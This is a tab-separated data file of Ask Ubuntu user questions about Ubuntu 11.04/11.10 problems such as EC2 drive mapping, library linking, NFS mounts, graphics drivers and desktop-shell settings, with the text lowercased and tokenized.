71616	ec2 ephemeral drives missing on 11.10 ami ? ( ami-21f53948 )	sorry in advance if this is the wrong place for this kind of question . i 'm porting some of my ec2 application 's start scripts to the 11.10 ami-21f53948 ami , from a similar 9.10 ( ami-6832d801 ) . one step of the process is to raid together the 4 ephemeral drives that come with a c1.xlarge . in the the previous ami these could be found at /dev/sd [ b-e ] . these devices appear to be absent in the new ami . it seems an instance using the new ami believes they should be there : $ curl 'http : //169.254.169.254/latest/meta-data/block-device-mapping/ ' & & echo ami ephemeral0 ephemeral1 ephemeral2 ephemeral3 root $ curl 'http : //169.254.169.254/latest/meta-data/block-device-mapping/ephemeral0 ' & & echo sdb $ curl 'http : //169.254.169.254/latest/meta-data/block-device-mapping/ephemeral1 ' & & echo sdc $ curl 'http : //169.254.169.254/latest/meta-data/block-device-mapping/ephemeral2 ' & & echo sdd $ curl 'http : //169.254.169.254/latest/meta-data/block-device-mapping/ephemeral3 ' & & echo sde does anyone have any light to shed on what i can do here ? perhaps they are available under different names ( despite the block device mapping ) or maybe i can create the needed device files ? any help is appreciated . while it 's not clear exactly how , this issue report may be related . much like the goggles , passing the block device mapping arguments to ec2-start-instances ( as one post suggested ) did nothing .
71620	install gnome 2.32 in ubuntu 11.10	is it possible to install gnome 2.3x in ubuntu 11.10 ? if yes how ? fallback mode wont do . it has to be gnome 2.3x gnome classic nor xubuntu are options beacause neither of them support 3 or more monitors
71621	how do i setup tty autologin in ubuntu which is running upstart	i was trying to find the /etc/inittab where i do my autologin . but in ubuntu 11.04 that file seems to be lost . is this the correct way you do it in ubuntu ? # auto login for ubuntu how ? # 1. apt-get install mingetty # 2. vim /etc/init/tty1.conf # tty1 - getty # # this service maintains a getty on tty1 from the point the system is # started until it is shut down again . start on stopped rc runlevel= [ 2345 ] stop on runlevel [ ! 2345 ] respawn # exec /sbin/getty -8 38400 tty1 exec /sbin/mingetty -- autologin < putyour_username_here > tty1 ^ |____ edited only this line , seems to be working
71622	is it possible to play imm4-codec videos ?	is it possible to watch imm4 codec encoded videos in ubuntu ?
71623	why does gsl-library not compile/link in 11.10 , despite that it did under 11.04 with the same makefile and program ?	i have a problem with the gsl library in oneiric - after upgrade from natty to oneiric i can not build a program anymore with my own makefile , despite the fact that in qt creator everything works fine and the program compiles with no problems . the necessary flags for the gsl libraries are set in both makefiles and on natty both ways of compiling the program worked well . the gsl library files are all installed . edit : the original code i tried to compile is written in c++ , which is the reason that i use g++ also with the test.c file this is the error message : user @ user : ~ $ g++ -lgsl -lgslcblas -lm /home/user/test.c /home/user/test.c : in function ‘int main ( ) ’ : /home/user/test.c:92:24 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘size_t { aka long unsigned int } ’ [ -wformat ] /tmp/ccolktzh.o : in function `my_f ( gsl_vector const* , void* ) ' : test.c : ( .text+0x25 ) : undefined reference to `gsl_vector_get' test.c : ( .text+0x3b ) : undefined reference to `gsl_vector_get' /tmp/ccolktzh.o : in function `my_df ( gsl_vector const* , void* , gsl_vector* ) ' : test.c : ( .text+0xf7 ) : undefined reference to `gsl_vector_get' test.c : ( .text+0x10d ) : undefined reference to `gsl_vector_get' test.c : ( .text+0x14c ) : undefined reference to `gsl_vector_set' test.c : ( .text+0x18a ) : undefined reference to `gsl_vector_set' /tmp/ccolktzh.o : in function `main ' : test.c : ( .text+0x26b ) : undefined reference to `gsl_vector_alloc' test.c : ( .text+0x288 ) : undefined reference to `gsl_vector_set' test.c : ( .text+0x2a1 ) : undefined reference to `gsl_vector_set' test.c : ( .text+0x2a8 ) : undefined reference to `gsl_multimin_fdfminimizer_conjugate_fr' test.c : ( .text+0x2bd ) : undefined reference to `gsl_multimin_fdfminimizer_alloc' test.c : ( .text+0x2e8 ) : undefined reference to `gsl_multimin_fdfminimizer_set' test.c : ( .text+0x2f9 ) : undefined reference to `gsl_multimin_fdfminimizer_iterate' test.c : ( .text+0x31e ) : undefined reference to `gsl_multimin_test_gradient' test.c : ( .text+0x357 ) : undefined reference to `gsl_vector_get' test.c : ( .text+0x374 ) : undefined reference to `gsl_vector_get' test.c : ( .text+0x3ca ) : undefined reference to `gsl_multimin_fdfminimizer_free' test.c : ( .text+0x3d6 ) : undefined reference to `gsl_vector_free' collect2 : ld returned 1 exit status this is the file i used for testing purposes : # include < gsl/gsl_multimin.h > /* paraboloid centered on ( p [ 0 ] , p [ 1 ] ) , with scale factors ( p [ 2 ] , p [ 3 ] ) and minimum p [ 4 ] */ double my_f ( const gsl_vector *v , void *params ) { double x , y ; double *p = ( double * ) params ; x = gsl_vector_get ( v , 0 ) ; y = gsl_vector_get ( v , 1 ) ; return p [ 2 ] * ( x - p [ 0 ] ) * ( x - p [ 0 ] ) + p [ 3 ] * ( y - p [ 1 ] ) * ( y - p [ 1 ] ) + p [ 4 ] ; } /* the gradient of f , df = ( df/dx , df/dy ) . */ void my_df ( const gsl_vector *v , void *params , gsl_vector *df ) { double x , y ; double *p = ( double * ) params ; x = gsl_vector_get ( v , 0 ) ; y = gsl_vector_get ( v , 1 ) ; gsl_vector_set ( df , 0 , 2.0 * p [ 2 ] * ( x - p [ 0 ] ) ) ; gsl_vector_set ( df , 1 , 2.0 * p [ 3 ] * ( y - p [ 1 ] ) ) ; } /* compute both f and df together . */ void my_fdf ( const gsl_vector *x , void *params , double *f , gsl_vector *df ) { *f = my_f ( x , params ) ; my_df ( x , params , df ) ; } int main ( void ) { size_t iter = 0 ; int status ; const gsl_multimin_fdfminimizer_type *t ; gsl_multimin_fdfminimizer *s ; /* position of the minimum ( 1,2 ) , scale factors 10,20 , height 30 . */ double par [ 5 ] = { 1.0 , 2.0 , 10.0 , 20.0 , 30.0 } ; gsl_vector *x ; gsl_multimin_function_fdf my_func ; my_func.n = 2 ; my_func.f = my_f ; my_func.df = my_df ; my_func.fdf = my_fdf ; my_func.params = par ; /* starting point , x = ( 5,7 ) */ x = gsl_vector_alloc ( 2 ) ; gsl_vector_set ( x , 0 , 5.0 ) ; gsl_vector_set ( x , 1 , 7.0 ) ; t = gsl_multimin_fdfminimizer_conjugate_fr ; s = gsl_multimin_fdfminimizer_alloc ( t , 2 ) ; gsl_multimin_fdfminimizer_set ( s , & my_func , x , 0.01 , 1e-4 ) ; do { iter++ ; status = gsl_multimin_fdfminimizer_iterate ( s ) ; if ( status ) break ; status = gsl_multimin_test_gradient ( s- > gradient , 1e-3 ) ; if ( status == gsl_success ) printf ( `` minimum found at : \n '' ) ; printf ( `` % 5d % .5f % .5f % 10.5f\n '' , iter , gsl_vector_get ( s- > x , 0 ) , gsl_vector_get ( s- > x , 1 ) , s- > f ) ; } while ( status == gsl_continue & & iter < 100 ) ; gsl_multimin_fdfminimizer_free ( s ) ; gsl_vector_free ( x ) ; return 0 ; }
71624	im message indicator in gnome-shell	i 'm trying to use instant messaging with gnome shell with the current ubuntu 11.10 but up to now this is a total disaster . i have these problems : when i want to write someone a message i have to manually start empathy with a right click and selecting `` new window '' because otherwise it only focuses an already open chat window instead of opening the roster . alternative is searching for the name in the just-type search , clicking the found user and then clicking the chat button . this is all to complicated . in previous gnome versions i could simply click the im icon in the tray to open the roster . what is the supposed way to do this now in gnome shell ? when someone writes me a message then this message is shortly displayed at the bottom of the screen . that 's nice when i 'm in front of the screen and notice it . but when i do n't notice this notification then it is minimized into this notification area which is n't visible by default . so i have to check manually if a new message has arrived . in previous gnome versions i had a blinking im icon in the tray which constantly notified me about a new message . how is that supposed to work in gnome shell now ? unity has a message indicator which displays a colored icon when a unread message is waiting . this is n't ideal but better than nothing . it also allows me to open the roster window in the context menu . how can i achieve something similar with gnome shell ?
71625	32 and 64 bit on one live usb stick	i have successfully created a bootable live usb stick on an 8gb drive with either the 32 and 64 bit version of 11.10 but not bother at the same time . i would like to put them both on the same stick along with a third distribution ( dsl ) so i only have to carry one drive . how do i modify the grub files to make this happen ?
71626	how do i boot into a basic graphics view ?	how do i start a session that will give me he very basic graphics or even just terminal view ? i would like to start applications just by typing their name . i would like to avoid the gui stuff as much as possible and use application only by need . is that possible at all ? thanks , akis
71634	security exploits affecting login ?	on ubuntu 10.04 , i choose system > disconnect > swich user , then at the login screen i can click ctrl+alt+f4 to get a command line over a black screen , & then click alt+f7 to redirect back to my password protected desktop without entering password ! how is it possible and how can i fix it ?
71635	dvd drive not visible in wine	before anything else , ubuntu mounts dvd 's with no problem . the problem is with wine . i ca n't configure it so the dvd drives appear on the list . i have tried a couple of solutions that i found on the forums , that define the route
71641	houdini apprentice not showing icons	houdini apprentice is not showing icons . anyone having this problem with houdini installs on ubuntu 11.10 ? help will be much appreciated .
71643	after installing ubuntu my screen 's frequency is out of range when i boot to windows	okay so i have vista home basic 32 bit , and had recently installed ubuntu 11.10 , but i discovered when i tried to boot onto vista , it said `` out of range '' , i know that the message is talking about refresh rate or resolution and i am sure i have the same resolution in ubuntu as vista . i 'm pretty sure my refresh rate is 60hz , but the out of range message says : v=somethingkhz h=58hz max=1280x1024 ( current and same resolution on both boots ) 1 last thing : i ca n't get into f8 boot menu for windows . any help is welcome !
71651	application indicator extra menuitem	i hope somebody could help me , i 'm trying to understand the app-indicator and i 'd like to know if i could make an indicator such as banshee ( with scale and buttons right on the menu ) . i tried to use api but as far as i understand it propose using standard gtk.menu widget with menuitem . i 'd like to know what banshee used . i do n't work on media app now , but i 'm sure that there are lots of examples when this can be really usefull . for example , for fast tuning brightness and this is n't done so suitable while using simple menuitems . i 've heard of libido . i can use the libido from python ? could not find a man for libido ( ( . thnx .
71654	how to create launchers that open applications in a terminal ?	i would like to make a launcher that directs an application to be opened in a terminal . i had it on maverick and it worked . and also , it added the application to the 'installed applications ' . at this moment , on 11.10 i can only make the desktop launcher . if i move it to the unity launcher , it creates a permanent launcher item , and it 's not included in the 'installed apps ' list as well . does anybody have a solution ?
71655	wont boot from usb , stops at syslinux copyright	created bootable 11.10 in windows from universal usb installer 1.8.6.8 , upon boot in my hp mini netbook it displays only this : syslinux 4.04 edd 2011-04-18 copyright ( c ) 1994-2011 h. peter anvin et al _ ( blinky cursor ) i tried removing `` ui '' from syslinux.cfg , no change ... ( re : ca n't install with usb pen drive , syslinux problem ) i also tried creating a bootable usb using unetbootin-windows-563 , no change . does anybody have any other ideas ?
71658	dell latitude e6420 multiple-monitors not working	has anybody managed to use a dell latitude e6420 with ubuntu 11.10 64bit installed on it with dual monitors ? i could not get it working . i have the notebook plugged into the docking station with two monitors attached ( one via vga one via dvi ) . the same setup works pretty well with windows 7 . any thoughts ?
71659	banshee does not remember sync settings	my phone connects , mounts and will sync files properly but will not remember settings between sessions . why not ? specifically i set it to sync podcasts entire library and check `` sync when first plugged in and when the libraries change . '' but every time i reconnect my phone i have to reset that setting . is it possible to force the setting to be remembered manually perhaps ? setup : htc mytouch 4g slide ( android 2.3.4 ) ubuntu 11.10 banshee 2.2.0
71664	the gnome terminal is very slow in gnome 3	when using the gnome terminal , if i try to create a new tab , or use `` c+tab '' to cycle to a new one , the terminal will take up to five full seconds to change . this seems to occur whether using zsh or bash . has anyone run into this issue ? or , does anyone know how to get debugging information from this ?
71671	nfs not mounting on 11.10 upgrade	i updated to oneiric a few days ago and my nfs shares will not connect as they always have with natty on this and other computers on my network . the error message is : mount.nfs : rpc.statd is not running but is required for remote locking . mount.nfs : either use '-o nolock ' to keep locks local , or start statd . mount.nfs : an incorrect mount option was specified so i did a clean install , copying in the fstab etc that worked on natty on this box , but get the same error . no auto mount on boot , and when i do for example sudo mount /nas/mydocs have tried -o nolock with no success fstab has lines like this , all working before upgrade 192.168.6.15 : /johnsstore /home/john/nas/mydocs nfs rw , auto sudo start statd start : job is already running : statd rpcinfo program version netid address service owner 100000 4 tcp6 : :.0.111 portmapper superuser 100000 3 tcp6 : :.0.111 portmapper superuser 100000 4 udp6 : :.0.111 portmapper superuser 100000 3 udp6 : :.0.111 portmapper superuser 100000 4 tcp 0.0.0.0.0.111 portmapper superuser 100000 3 tcp 0.0.0.0.0.111 portmapper superuser 100000 2 tcp 0.0.0.0.0.111 portmapper superuser 100000 4 udp 0.0.0.0.0.111 portmapper superuser 100000 3 udp 0.0.0.0.0.111 portmapper superuser 100000 2 udp 0.0.0.0.0.111 portmapper superuser 100000 4 local /run/rpcbind.sock portmapper superuser 100000 3 local /run/rpcbind.sock portmapper superuser 100024 1 udp 0.0.0.0.138.56 status 114 100024 1 tcp 0.0.0.0.228.44 status 114 100024 1 udp6 : :.236.85 status 114 100024 1 tcp6 : :.142.26 status 114
71672	how do you turn of the touchpad when typing to avoid the cursor jumping around ?	it is nearly impossible to type on my dell latitude because the cursor jumps around anytime i get close to the touch pad . there is not a setting to inactivate it during typing . i am using ubuntu 11.10 .
71673	how to install w32codecs on 64 bit ubuntu ?	according to https : //help.ubuntu.com/community/amd64 it is possible . however a detailed step by step on how to install w32codecs on a 64 bit ubuntu is not given .
71674	imaging - how can i make a terminal prompt on first boot	i image many computers with ubuntu . i use clonezilla and have a script that does things like setting the hostname on first boot . i 'd like this script to ask me a question . how can this be achieved ? upstart is concurrent and does n't show any particular terminal so i 'm not sure how this could be done . if you 're wondering why , i 'd like for it to ask me what school i 'm at which would run a specific script for that school 's customizations . this way i can have one company image that runs everywhere i work in .
71678	can i collapse the `` shortcuts '' area in the dash ?	is there a way to collapse the icon area of the dash , so that i just see the search bar ? i 'm pretty sure i was able to do this in 11.04 . i remember having it set up so that i would only see the search bar when dash was open . i think there may have been a drop-down button to collapse it . but i no longer see this in 11.10 . am i crazy or was this feature removed ? can i get it back ? i never use the icon area at all ( or the lenses for that matter ) and would like to hide or disable them .
71682	is there a way to open the `` connect to server '' without opening nautilus first ?	currently the only way i know of to open the `` connect to server '' dialog box is to open up nautilus first . while this is n't that complex a task , it still requires using the mouse , at a minimum : launch nautilus ( super + 1 ) move mouse to top left to `` file '' select `` connect to server '' it would be great if i could simply click the super button to go into the dash and type `` connect to '' and click enter .
71684	how do you restore the last minimized application in unity from the launcher ?	i do n't know if this is a bug or 'feature ' ( sadly hoping that it 's the former ) but when i minimize the last application , i can not restore it just by clicking its launcher icon . this small screencap shows what 's going on : screencap do i have to click on the desktop every time i want to restore the last minimized application ? or is it a mis-configuration from my part ?
71688	installing `` radeonhd '' drivers	how do i go about install the `` radeonhd '' drivers in ubuntu 11.04 ?
71691	how to i install a free nx server ?	i was trying to install it and i got something like this ... w : failed to fetch http : //ppa.launchpad.net/freenx-team/ppa/ubuntu/dists/oneiric/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/freenx-team/ppa/ubuntu/dists/oneiric/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . can someone guide me through installing it on ubuntu 's latest ? thanks ,
71695	what codecs are supported by the different gstreamer plugin sets ?	what codecs are supported by the `` good '' plugin set ? what codecs are supported by the `` bad '' plugin set ? what codecs are supported by the `` ugly '' plugin set ? i would like a list of codecs in each plugin set .
71700	how do i create a package that contains pictures that copy themselves directly to the `` backgrounds '' folder ?	how do i create a package that contains pictures that copy themselves directly to the `` backgrounds '' folder ?
71701	how to find the default file format associations & applications menu	where can i find the default file format associations menu ? ex . i would like to open all .doc files with microsoft word , instead of archive manager . this is a constant pain !
71702	what 's the difference between gstreamer0.10-plugins-bad and the -multiverse plugin ?	what is the difference between gstreamer0.10-plugins-bad and gstreamer0.10-plugins-bad-multiverse ?
71704	reformat soft raid-5 ubuntu	i built a linux ( ubuntu ) box a year ago and decided to have some fun and use a soft raid 5 . i followed the instructions here . things seemed to work fine , but now it 's time to reformat the computer and start with the newest version of ubuntu . i get to the partition part of the install and run into problems . the system sees my raid 5 ( md0 ) , i just ca n't seem to get it to reformat that raid . i have 3 1tb drives ( so i get 2tb of storage ) . all 3 are raided up . first off , is that ok ? having all my drives in the same array ( including the boot ) . it seemed silly to me to raid a block of drives but not have the boot drive raided , because then if the boot drive failed the raid would be dead anyway . or is that thinking wrong ? i ask because the tutorial i linked to said the /boot drive has to be on a type 1 array . during the partition portion of the installation , the only thing i can find to `` delete '' the raid is an option to erase the raid . the next screen says that random bits will be written to the drives and the raid will be gone . i 'm guessing this process could take some time , but i started it 30 minutes ago and it is n't even reporting as being 1 % done . is there an easy way to just delete the raid partition , then recreate the raid ( i do n't need the drives erased , just a quick reformat would do ) . thanks note i posted this on superuser too . did n't realize this forum existed . sorry
71708	how do i open access-your-private-data.desktop ?	help how do i open this . the readme file says this directory has been unmounted to protect your data . from the graphical desktop , click on : `` access your private data '' or from the command line , run : ecryptfs-mount-private how do i run this so that i can get my data ?
71710	ubuntu stuck at boot after update	i 'm doing this question because i ca n't edit other questions and i 'm trying to set up my computer with ubuntu but i 'm a total idiot about this . i want to give ubuntu a try , i build up a system specially for ubuntu but when everything seems to be ok i made a suggested update and now when i restart my computer ubuntu is stuck in the purple screen . i read other questions about this but , as i said , i 'm a total idiot with this and i do n't understand a bit what you guys are talking about when saying reboot with grub , press ctrl-f4 or whatever . my keyboard shutdown when this happens and only accepts alt-ctrl-del to reboot again . ctrl-f4 is not working for me . pleas help me , cure my ms insanity pleaseee ! : ) any help i will appreciate it !
71713	video tearing when playing on external monitor	i am running mythtv on ubuntu 11.04 , and i 've plugged it in to an lcd monitor and an hdtv . if i watch video on the lcd monitor , it seems fine - no tearing . but , i 've always had tearing ( when the picture motion is fast i.e action scenes ) on the external monitor : when using twinview clone with a crt tv over s-video when using twinview leftof or clone hdtv over dvi i 'm running a gigabyte nvidia geforce 8400gs . is the video card simply not up to it ? ( if so , what video card would be appropriate ? ) or have i got it configured wrong ? ( sorry , bit of a novice in this area , not sure what information to give ) . thanks .
71714	is there a working version of paint.mono for 11.04 ?	im looking for a ubuntu 11.04 version of paint.mono ? has anyone seen a package available for download as yet ? i found this link..http : //www.webupd8.org/2009/09/paintnet-for-linux-paintmono.html but only shows previous versions .
71720	rhythmbox does n't activate any plugin	when i like put a plugin in rhythmbox ( ubuntu 11.10 ) this does n't load anything ... put my plugins in .gnome2/rhythmbox/plugins and /usr/lib/rhythmbox/plugins and is useless !
71722	how do i remove the application icon from the top panel ?	i started using gnome shell 3.2 today and i think the topbar can be a little bit better . i want to know if this is possible to make and , if possible , how i make it : this is how is now : this is how i think is better : it 'just ' remove the icon above the app name .
71729	rhythmbox does n't find sansa clip+	i am currently trying to get rhythmbox to recognized my sansa clip+ , which used to work in previous versions . i am now on a fresh xubuntu install and it no longer recognizes the player . however running rhythmbox with rhythmbox -d and then manually mounting the players shows that the player is actually detected properly , it just never shows up in the gui . the last line , unhandled media hints at something being wrong , but what ? ( 03:01:06 ) [ 0x9a77068 ] [ rhythmdb_mount_added_cb ] rhythmdb-monitor.c:430 : volume file : ///media/mp3 mounted ( 03:01:06 ) [ 0x9a77068 ] [ rhythmdb_read_enter ] rhythmdb.c:1229 : counter : 1 ( 03:01:06 ) [ 0x9a77068 ] [ rhythmdb_query_internal ] rhythmdb.c:4016 : doing query ( 03:01:06 ) [ 0x9a77068 ] [ do_query_recurse ] rhythmdb-tree.c:2304 : doing recursive query , 1 conjunctions ( 03:01:06 ) [ 0x9a77068 ] [ rhythmdb_query_internal ] rhythmdb.c:4022 : completed ( 03:01:06 ) [ 0x9a77068 ] [ rhythmdb_mount_added_cb ] rhythmdb-monitor.c:444 : 0 mounted entries to process ( 03:01:06 ) [ 0x9a77068 ] [ dump_volume_identifiers ] rb-removable-media-manager.c:627 : unix-device = /dev/sde ( 03:01:06 ) [ 0x9a77068 ] [ dump_volume_identifiers ] rb-removable-media-manager.c:627 : uuid = 0123-4567 found device path /dev/sde for mount /media/mp3 found id_media_player tag sandisk_sansa-clip-plus for device /dev/sde device information ( system database ) information read from system device database model : sansa_clip+_4gb vendor : sandisk filesystem uuid : 0123-4567 drive type : ( none ) requires eject : true access protocols : storage output formats : audio/mpeg audio/x-ms-wma audio/audible application/ogg audio/ogg audio/flac audio/x-wav audio/x-pn-audibleaudio input formats : audio/x-wav playlist formats : audio/x-mpegurl playlist path : audio folders : music/ podcast/ podcasts/ record/fm/ record/voice/ audible/ audiobooks/ folder depth : -1 /media/mp3 is already a mount point override file /media/mp3/.is_audio_player not found on mount /media/mp3 ( 03:01:06 ) [ 0x9a77068 ] [ rb_removable_media_manager_add_mount ] rb-removable-media-manager.c:748 : unhandled media
71733	tomboy notes : failed to synchronize	in my new ubuntu 11.10 install the tomboy notes synchronizes just some of my notes notes and then fails . the details only shows the updated notes . when i look at the .config/tomboy/tomboy.log i see the error : 10/24/2011 11:12:29 pm [ error ] : synchronization failed with the following exception : a note with this title already exists : new note template at tomboy.notemanager.createnewnote ( system.string title , system.string xml_content , system.string guid ) [ 0x00000 ] in < filename unknown > :0 at tomboy.notemanager.createnotefromtemplate ( system.string title , tomboy.note template_note , system.string guid ) [ 0x00000 ] in < filename unknown > :0 at tomboy.notemanager.createnewnote ( system.string title , system.string guid ) [ 0x00000 ] in < filename unknown > :0 at tomboy.notemanager.createwithguid ( system.string title , system.string guid ) [ 0x00000 ] in < filename unknown > :0 at tomboy.sync.syncmanager+ < createnoteinmainthread > c__anonstorey11. < > m__3f ( ) [ 0x00000 ] in < filename unknown > :0 at tomboy.guiutils+ < gtkinvokeandwait > c__anonstoreyc. < > m__2f ( system.object , system.eventargs ) [ 0x00000 ] in < filename unknown > :0 i have tryed changing the url on the sync preferences to https : //edge.one.ubuntu.com/notes/ as sugested in question 66753 but it did not work .
71734	dash panel is not visible	i recently upgraded ubuntu from version 11.04 to 11.10 . after about two days of using this new version the dash did n't appear on the top , and i was n't able to access the programs that i use . let me describe : the bar on the top with the clock and internet connections is not there . the only remains are the notification messages that a connection has been found , which allows me to connect to the internet ; and the menus from what appear to be a nautilus application but i 'm not sure , they read file edit view go bookmarks help , and they open my home folder . the icons of my favourite applications are not there , and i am unable to access them wit alt+f2 or the super key . the only thing that 's available is the terminal with the shortcut ctrl+alt+t . by the way , in order to keep using the computer i had to run the ubuntu 2d version at the beginning , but as you would imagine that is not optimal since i was already looking forward to the new features of ubuntu 11.10 .
71736	how do i re-enable the backlight ?	since oneiric , if i leave my machine ( hp mini 110 netbook ) unattended and it goes into power-save mode , the backlight gets disabled . how can i turn it back on ? note that the keyboard backlight controls ( fn+f4 and fn+f3 ) do n't have any effect in this situation . i 've already filed a bug , but filing a bug does n't fix my problem . i tried this workaround posted in this bug report dealing with acer laptops : sudo setpci -s 00:02.0 f4.b=0 however , if anything , that command makes things worse . in the general case , i can see a little bit if i 'm in a dark room with a flashlight aimed just so . but after running setpci i ca n't see anything . and i find the setpci documentation to be utterly incomprehensible , so i do n't know whether i need to tweak my command somehow or whether i 'm completely barking up the wrong tree . update : i 've found a workaround : i 'm now booting with the kernel parameter acpi=off . this disables power management , which prevents the machine from going into power saving mode and thus failing to come back up correctly . of course , not having power management means that i ca n't use suspend or do anything to manage power other than powering it off ( even then , i have to manually use the power switch ) . also , it prevents me from using unity 3d or gnome shell , forcing me into unity 2c or gnome classic . so , i 'd really like to be able to stop using this hack . update 2 : midway through oneiric 's run , a kernel update fixed this issue . but this question is still relevant as a general procedure for working around showstopper kernel regressions .
71737	change brightness vaio fz	i ca n't change the brightness on my vaio vgn-fz340e . there is n't even a slider on the screens window . the only way i 've found to do it is to use smartdimmer throught the command line , however this is pretty inconvenient . any help would be appreciated .
71746	no package 'gstreamer-0.10 ' found when installing openframeworks	i have been trying for a while now to install openframeworks on my 11.10 . for those familiar with openframeworks , a script called install_dependencies.sh is provided and it should install all dependencies that are needed by openframeworks . when running the script after updating my os to 11.10 , it will eventually stop and these are the last lines that it outputs : package gstreamer-0.10 was not found in the pkg-config search path . perhaps you should add the directory containing `gstreamer-0.10.pc' to the pkg_config_path environment variable no package 'gstreamer-0.10 ' found compiling object for ../../../openframeworks/video/ofvideoplayer.cpp mkdir -p obj/debug/openframeworks/video g++ -g3 -wall -fexceptions -i../../../freeimage/include -i../../../assimp/include - i../../../assimp/include/compiler -i../../../cairo/include -i../../../cairo/include/libpng15 -i../../../cairo/include/pixman-1 -i../../../cairo/include/cairo -i../../../fmodex/include -i../../../freetype/include -i../../../freetype/include/freetype2 -i../../../freetype/include/freetype2/freetype -i../../../freetype/include/freetype2/freetype/config -i../../../freetype/include/freetype2/freetype/internal -i../../../freetype/include/freetype2/freetype/internal/services -i../../../glew/include -i../../../glew/include/gl -i../../../kiss/include -i../../../portaudio/include -i../../../rtaudio/include -i../../../tess2/include -i../../../poco/include -i../../../glu/include -i../../../openframeworks/ -i../../../openframeworks/events -i../../../openframeworks/video -i../../../openframeworks/3d -i../../../openframeworks/sound -i../../../openframeworks/utils -i../../../openframeworks/types -i../../../openframeworks/math -i../../../openframeworks/communication -i../../../openframeworks/app -i../../../openframeworks/gl -i../../../openframeworks/graphics -mmd -mp - mfobj/debug/openframeworks/video/ofvideoplayer.d - mtobj/debug/openframeworks/video/ofvideoplayer.d -o obj/debug/openframeworks/video/ofvideoplayer.o -c ../../../openframeworks/video/ofvideoplayer.cpp in file included from ../../../openframeworks/video/ofgstvideoplayer.h:3:0 , from ../../../openframeworks/video/ofvideoplayer.h:9 , from ../../../openframeworks/video/ofvideoplayer.cpp:1 : ../../../openframeworks/video/ofgstutils.h:5:21 : fatal error : gst/gst.h : no such file or directory compilation terminated . make : *** [ obj/debug/openframeworks/video/ofvideoplayer.o ] error 1 there has been a problem compiling debug of library please report this problem in the forums i have gstreamer-0.10 installed and i 've tried everything that i could find from people with similar issues , but yet i have n't been able to run that script to completion . would anyone have any suggestions ?
71750	dragging a window is laggy ( windows do not follow the mouse while moving smoothly )	when trying to drag a window the whole screen becomes laggy and some windows when dragged do not even appear until i release the mouse . they do appear where the window was suppose to end up after the drag but the dragging animation that happens while dragging is not seen . i am using a nvidia 9500 gt 1gb with the proprietary drivers , an intel core 2 duo 8500 and 4gb ram just to make sure that this is not the problem . in 11.04 it worked correctly when dragging .
71752	disable computer from booting into gnome	i have a laptop running ubuntu server . i installed ubuntu desktop onto it by running sudo apt-get install ubuntu-desktop . now , by default , the computer boots into gnome . what can i do to make it boot to a command line again . i do not want to boot into gnome by default .
71753	rollback from proprietary to open source ati drivers causes unity to not start anymore	i just installed ubuntu 11.10 . i changed the open drivers for the proprietary ones and had all sorts of problems while trying to make dual screens work , so i decided to roll back the drivers . now unity wo n't start and if i run /usr/lib/nux/unity_support_test -p i get : /usr/lib/nux/unity_support_test : error while loading shared libraries : libgl.so.1 : can not open shared object file : no such file or directory . i tried mostly everything that was suggested on the net with the purge and everything . installing ccsm and adding the unity plugin did not work . i also just learned about that missing file while writing this question , so thats where i 'm heading now . if you need more info just say so .
71756	is there a ppa or other repository for recent proprietary ati drivers ?	i was happy to find the x updates ppa as it has made installing newer nvidia drivers much easier . without using the ppa , i found that the driver installed using the restricted drivers gui often 'killed ' systems with newer nvidia cards . now it 's just a matter of adding the x updates ppa , updating installed packages then installing the restricted nvidia driver . unfortunately it looks like the fglrx-installer in the x-updates ppa is nearly a year old and i 'm a bit leary of using it on newer amd gear like the fusion apus . is there a repo i can add to easily install those drivers as well ? the command line package building is a bit tedious and if there 's a ppa that would make the restricted driver gui usable for most ati & nvidia hardware and it make things much easier .
71760	error : version number does not start with digit	i 'm installing adobe air in ubuntu v11.04 . the installation process is successful . but when i tried to install an adobe air application , errors occur . here 's the usual error i 've got from my .appdata/adobe/air/logs/install.log : [ airinstall:20544 ] [ err ] error occurred during rpm install operation ; beginning rollback : errorevent type= '' error '' bubbles=false cancelable=false eventphase=2 text= '' error : dpkg : error processing /tmp/flashtmp.fbscal/setup.deb ( -- install ) : ; parsing file '/var/lib/dpkg/tmp.ci/control ' near line 2 package 'myapp.74249ff9cb321f1d45f6ea93a89630d1be111ef2.1 ' : ; error in version string 'v1.48.40 ' : version number does not start with digit ; errors were encountered while processing : ; /tmp/flashtmp.fbscal/setup.deb '' errorid=1 ] i 've followed every instructions here and install as root . what did i 've done wrong ? according to some forums i 've read , this has something to do with the version policy of dpkg but i do n't know how to configured dpkg to ignore versioning . anyone knows how to solve this ? please help me out . thank you .
71761	1336x768 resolution not recognized	i 'm completely new to ubuntu and linux in general . i 'm using 11.10 and it 's installed already . when i ran it from dvd the resolution was just fine but now that it 's installed i can only choose between 800x600 and 1024x768 . i 've searched around on google and saw similar issues but i do n't think they helped . i tried some commands too but the only resolutions displayed in the terminal are the ones i mentioned above . what would cause this and what can i do to fix it ?
71762	why was my touchpad soft-disabled on ubuntu update ?	i updated to 10.10 from , i believe , 10.4 ; i 'd only had it on this machine ( dell inspiron e1505 ) for a few months , so it was a pretty late version . after updating , my touchpad was completely nonfunctional . after spending several hours trying to figure out what was wrong , i found out that the command synclient touchpadoff=0 was all that was needed to resolve the issue . synclient -l before fixing the issue ( i 've never touched synclient or configured such things manually , this is all default to the best of my knowledge ) . so my question : why was my touchpad disabled ( thru a config change ) during update ?
71764	how to contribute to very outdated pages in ubuntu	i was looking for hardware pages in the ubuntu wiki like for example : https : //wiki.ubuntu.com/hardwaresupportcomponentsmultimediawebcamerasgenius and the last time several of those were tested was before star wars was invented . so how can i help in pages like those to update the webcams there and add new ones . in this example is webcams but the intention is not just webcams but other hardware . since this is the wiki for ubuntu i would like to help to keep it updated with new hardware since i get to see a lot of hardware on a daily basis .
71767	can not set tp_smapi thresholds on a thinkpad	i have a thinkpad edge 13 , with the package tp-smapi-dkms installed . as described in these instructions , i have also run sudo modprobe tp_smapi , and added tp_smapi to /etc/modules before upgrade to 11.10 , i used to be able to change thresholds for stopping battery charging . i would open the file /sys/devices/platform/smapi/bat0/stop_charge_thresh as administrator and change the value from 100 to 85 . now , i am no longer able to directly edit that file . i also tried sudo echo 85 > /sys/devices/platform/smapi/bat0/stop_charge_thresh but get permission denied .
